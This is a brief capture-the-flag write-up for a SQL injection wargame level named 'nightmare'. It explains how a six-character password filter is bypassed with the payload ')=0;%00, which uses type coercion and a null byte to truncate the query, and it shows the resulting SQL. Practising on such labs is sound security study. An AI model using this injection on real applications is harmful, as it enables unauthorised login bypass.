nightmare
We are provided with the SQL query:
SELECT id FROM prob_nightmare WHERE pw=('{$_GET[pw]}') AND id!='admin'
Filter
The code filters out the following:
pwparameter value greater than 6 characters#-
In order to make the given SQL query result in TRUE, we have to set the password to an empty string.
In order to do so within 6 characters, we can provide the following URI parameter:
?pw=')=0
The resultant query becomes:
SELECT id FROM prob_nightmare WHERE pw=('')=0') AND id!='admin'
Now, in order to remove the rest of query we have use a NULL byte (%00). This terminates the query.
We also have to add a semi-colon (;) before terminating the query.
If we provide the following URI parameter:
?pw=')=0;%00
The resultant query becomes:
SELECT id FROM prob_nightmare WHERE pw=('')=0;
## Terminated part:
') AND id!='admin'